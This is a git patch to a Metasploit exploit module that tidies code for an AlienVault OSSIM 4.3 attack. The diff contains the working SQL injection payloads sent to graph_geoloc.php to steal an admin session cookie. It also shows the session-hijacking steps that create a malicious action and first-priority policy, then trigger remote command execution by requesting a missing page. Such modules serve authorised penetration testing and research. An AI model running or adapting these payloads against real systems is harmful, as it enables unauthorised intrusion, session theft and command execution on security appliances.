From 245b59124727210386920bc3fecc40367e8db8d2 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Mon, 28 Apr 2014 11:45:40 -0500 Subject: [PATCH] Do module clean up --- .../unix/webapp/alienvault_sqli_exec.rb | 182 +++++++++--------- 1 file changed, 92 insertions(+), 90 deletions(-) diff --git a/modules/exploits/unix/webapp/alienvault_sqli_exec.rb b/modules/exploits/unix/webapp/alienvault_sqli_exec.rb index 8c7653c8a5..f3bfa8a513 100644 --- a/modules/exploits/unix/webapp/alienvault_sqli_exec.rb +++ b/modules/exploits/unix/webapp/alienvault_sqli_exec.rb @@ -27,12 +27,14 @@ class Metasploit3 < Msf::Exploit::Remote ], 'References' => [ + ['OSVDB', '106252'], + ['EDB', '33006'] ], 'DefaultOptions' => { 'SSL' => true }, - 'Platform' => ['unix'], + 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Payload' => { @@ -43,10 +45,10 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Targets' => [ - ['Alienvault OSSIM', {}] + ['Alienvault OSSIM 4.3', {}] ], 'Privileged' => true, - 'DisclosureDate' => "Apr 28 2014", + 'DisclosureDate' => "Apr 24 2014", 'DefaultTarget' => 0)) register_options( @@ -58,22 +60,20 @@ class Metasploit3 < Msf::Exploit::Remote def check - # Check version - vprint_status("#{peer} - Trying to detect vulnerable OSSIM") - marker = rand_text_alpha(6) - sqlirand = rand_text_numeric(4+rand(4)) + sqli_rand = rand_text_numeric(4+rand(4)) sqli = "' and(select 1 from(select count(*),concat((select (select concat(0x#{marker.unpack('H*')[0]},Hex(cast(user() as char)),0x#{marker.unpack('H*')[0]})) " - sqli << "from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1" + sqli << "from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '#{sqli_rand}'='#{sqli_rand}" res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'geoloc', 'graph_geoloc.php'), 'vars_get' => { 'date_from' => sqli } }) - if res and res.code == 200 and res.body =~ /#{marker}726F6F74403132372E302E302E31#{marker}/ # 726F6F74403132372E302E302E31 = root@127.0.0.1 + if res && res.code == 200 && res.body =~ /#{marker}726F6F7440[0-9a-zA-Z]+#{marker}/ # 726F6F7440 = root return Exploit::CheckCode::Vulnerable else + print_status("#{res.body}") return Exploit::CheckCode::Safe end @@ -82,9 +82,9 @@ class Metasploit3 < Msf::Exploit::Remote def exploit marker = rand_text_alpha(6) - sqlirand = rand_text_numeric(4+rand(4)) + sqli_rand = rand_text_numeric(4+rand(4)) sqli = "' and (select 1 from(select count(*),concat((select (select concat(0x#{marker.unpack('H*')[0]},Hex(cast(id as char)),0x#{marker.unpack('H*')[0]})) " - sqli << "from alienvault.sessions where login='admin' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '#{sqlirand}'='#{sqlirand}" + sqli << "from alienvault.sessions where login='admin' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '#{sqli_rand}'='#{sqli_rand}" print_status("#{peer} - Trying to grab admin session through SQLi") @@ -93,9 +93,9 @@ class Metasploit3 < Msf::Exploit::Remote 'vars_get' => { 'date_from' => sqli } }) - if res and res.code == 200 and res.body =~ /#{marker}(.*)#{marker}/ - adminsession = $1 - @cookie = "PHPSESSID=" + ["#{adminsession}"].pack("H*") + if res && res.code == 200 && res.body =~ /#{marker}(.*)#{marker}/ + admin_session = $1 + @cookie = "PHPSESSID=" + ["#{admin_session}"].pack("H*") print_status("#{peer} - Admin session cookie is [ #{@cookie} ]") else fail_with(Failure::Unknown, "#{peer} - Failure retrieving admin session") @@ -118,24 +118,26 @@ class Metasploit3 < Msf::Exploit::Remote } }) - if res and res.code == 200 + if res && res.code == 200 print_status("#{peer} - Created Action [ #{action} ]") else fail_with(Failure::Unknown, "#{peer} - Action creation failed!") end - # Retrieving the Action ID, used to clean up the action after succesful exploitation - post_vars = "page=1&rp=2000" + # Retrieving the Action ID, used to clean up the action after successful exploitation res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, "ossim", "action", "getaction.php"), 'cookie' => @cookie, - 'data' => post_vars + 'vars_post' => { + 'page' => '1', + 'rp' => '2000' + } }) - if res and res.code == 200 and res.body =~ /actionform.php\?id=(.*)'>#{action}/ - @actionid = $1 - print_status("#{peer} - Action ID is [ #{@actionid} ]") + if res && res.code == 200 && res.body =~ /actionform\.php\?id=(.*)'>#{action}/ + @action_id = $1 + print_status("#{peer} - Action ID is [ #{@action_id} ]") else fail_with(Failure::Unknown, "#{peer} - Action ID retrieval failed!") end @@ -143,7 +145,7 @@ class Metasploit3 < Msf::Exploit::Remote # Retrieving the policy data, necessary for proper cleanup after succesful exploitation res = send_request_cgi({ 'method' => 'GET', - 'uri' => normalize_uri(target_uri.path, "ossim", "policy", "policy.php"), + 'uri' => normalize_uri(target_uri.path.to_s, "ossim", "policy", "policy.php"), 'cookie' => @cookie, 'vars_get' => { 'm_opt' => 'configuration', @@ -152,10 +154,10 @@ class Metasploit3 < Msf::Exploit::Remote } }) - if res and res.code == 200 and res.body =~ /getpolicy.php\?ctx=(.*)\&group=(.*)',/ - policyctx = $1 - policygroup = $2 - print_status("#{peer} - Policy data [ ctx=#{policyctx} ] and [ group=#{policygroup} ] retrieved!") + if res && res.code == 200 && res.body =~ /getpolicy\.php\?ctx=(.*)\&group=(.*)',/ + policy_ctx = $1 + policy_group = $2 + print_status("#{peer} - Policy data [ ctx=#{policy_ctx} ] and [ group=#{policy_group} ] retrieved!") else fail_with(Failure::Unknown, "#{peer} - Retrieving Policy data failed!") end @@ -169,8 +171,8 @@ class Metasploit3 < Msf::Exploit::Remote 'vars_post' => { 'descr' => policy, 'active' => '1', - 'group' => policygroup, - 'ctx' => policyctx, + 'group' => policy_group, + 'ctx' => policy_ctx, 'order' => '1', # Makes this the first policy, overruling all the other policies 'action' => 'new', 'sources[]' => '00000000000000000000000000000000', # Source is ANY @@ -201,7 +203,7 @@ class Metasploit3 < Msf::Exploit::Remote 'end_day_week' => '7', 'end_day_month' => '31', 'end_month' => '12', - 'actions[]' => @actionid, + 'actions[]' => @action_id, 'sim' => '1', 'priority' => '1', 'qualify' => '1', @@ -211,7 +213,7 @@ class Metasploit3 < Msf::Exploit::Remote } }) - if res and res.code == 200 + if res && res.code == 200 print_status("#{peer} - Created Policy [ #{policy} ]") else fail_with(Failure::Unknown, "#{peer} - Policy creation failed!") @@ -223,23 +225,22 @@ class Metasploit3 < Msf::Exploit::Remote 'uri' => normalize_uri(target_uri.path, "ossim", "policy", "getpolicy.php"), 'cookie' => @cookie, 'vars_get' => { - 'ctx' => policyctx, - 'group' => policygroup + 'ctx' => policy_ctx, + 'group' => policy_group }, 'vars_post' => { 'page' => '1', 'rp' => '2000' } }) - if res and res.code == 200 and res.body =~ /row id='(.*)' col_order='1'/ - @policyid = $1 - print_status("#{peer} - Policy ID [ #{@policyid} ] retrieved!") + if res && res.code == 200 && res.body =~ /row id='(.*)' col_order='1'/ + @policy_id = $1 + print_status("#{peer} - Policy ID [ #{@policy_id} ] retrieved!") else fail_with(Failure::Unknown, "#{peer} - Retrieving Policy ID failed!") end # Reload the policies to make our new policy active - policy = rand_text_alpha(8) print_status("#{peer} - Reloading Policies") res = send_request_cgi({ 'method' => 'GET', @@ -251,7 +252,7 @@ class Metasploit3 < Msf::Exploit::Remote } }) - if res and res.code == 200 + if res && res.code == 200 print_status("#{peer} - Policies reloaded!") else fail_with(Failure::Unknown, "#{peer} - Policy reloading failed!") @@ -259,15 +260,15 @@ class Metasploit3 < Msf::Exploit::Remote # Request a non-existing page, which will trigger a SIEM event (and thus our payload), but not an alarm. - dontexist = rand_text_alpha(8+rand(4)) + dont_exist = rand_text_alpha(8+rand(4)) print_status("#{peer} - Triggering policy and action by requesting a non existing url") res = send_request_cgi({ 'method' => 'GET', - 'uri' => normalize_uri(target_uri.path, dontexist), + 'uri' => normalize_uri(target_uri.path, dont_exist), 'cookie' => @cookie }) - if res and res.code == 404 + if res && res.code == 404 print_status("#{peer} - Payload delivered") else fail_with(Failure::Unknown, "#{peer} - Payload failed!") @@ -277,58 +278,59 @@ class Metasploit3 < Msf::Exploit::Remote def cleanup - # Clean up, retrieve token so that the policy can be removed - print_status("#{peer} - Cleaning up") - res = send_request_cgi({ - 'method' => 'POST', - 'uri' => normalize_uri(target_uri.path, "ossim", "session", "token.php"), - 'cookie' => @cookie, - 'vars_post' => { 'f_name' => 'delete_policy' } - }) + begin + # Clean up, retrieve token so that the policy can be removed + print_status("#{peer} - Cleaning up") + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, "ossim", "session", "token.php"), + 'cookie' => @cookie, + 'vars_post' => { 'f_name' => 'delete_policy' } + }) - if res and res.code == 200 and res.body =~ /\{\"status\":\"OK\",\"data\":\"(.*)\"\}/ - token = $1 - print_status("#{peer} - Token [ #{token} ] retrieved") - else - print_warning("#{peer} - Unable to retrieve token") + if res && res.code == 200 && res.body =~ /\{\"status\":\"OK\",\"data\":\"(.*)\"\}/ + token = $1 + print_status("#{peer} - Token [ #{token} ] retrieved") + else + print_warning("#{peer} - Unable to retrieve token") + end + + # Remove our policy + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, "ossim", "policy", "deletepolicy.php"), + 'cookie' => @cookie, + 'vars_get' => { + 'confirm' => 'yes', + 'id' => @policy_id, + 'token' => token + } + }) + + if res && res.code == 200 + print_status("#{peer} - Policy ID [ #{@policy_id} ] removed") + else + print_warning("#{peer} - Unable to remove Policy ID") + end + + # Remove our action + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, "ossim", "action", "deleteaction.php"), + 'cookie' => @cookie, + 'vars_get' => { + 'id' => @action_id, + } + }) + + if res && res.code == 200 + print_status("#{peer} - Action ID [ #{@action_id} ] removed") + else + print_warning("#{peer} - Unable to remove Action ID") + end + ensure + super # mixins should be able to cleanup even in case of Exception end - - # Remove our policy - res = send_request_cgi({ - 'method' => 'GET', - 'uri' => normalize_uri(target_uri.path, "ossim", "policy", "deletepolicy.php"), - 'cookie' => @cookie, - 'vars_get' => { - 'confirm' => 'yes', - 'id' => @policyid, - 'token' => token - } - }) - - if res and res.code == 200 - token = $1 - print_status("#{peer} - Policy ID [ #{@policyid} ] removed") - else - print_warning("#{peer} - Unable to remove Policy ID") - end - - # Remove our action - res = send_request_cgi({ - 'method' => 'GET', - 'uri' => normalize_uri(target_uri.path, "ossim", "action", "deleteaction.php"), - 'cookie' => @cookie, - 'vars_get' => { - 'id' => @actionid, - } - }) - - if res and res.code == 200 - token = $1 - print_status("#{peer} - Action ID [ #{@actionid} ] removed") - else - print_warning("#{peer} - Unable to remove Action ID") - end - end end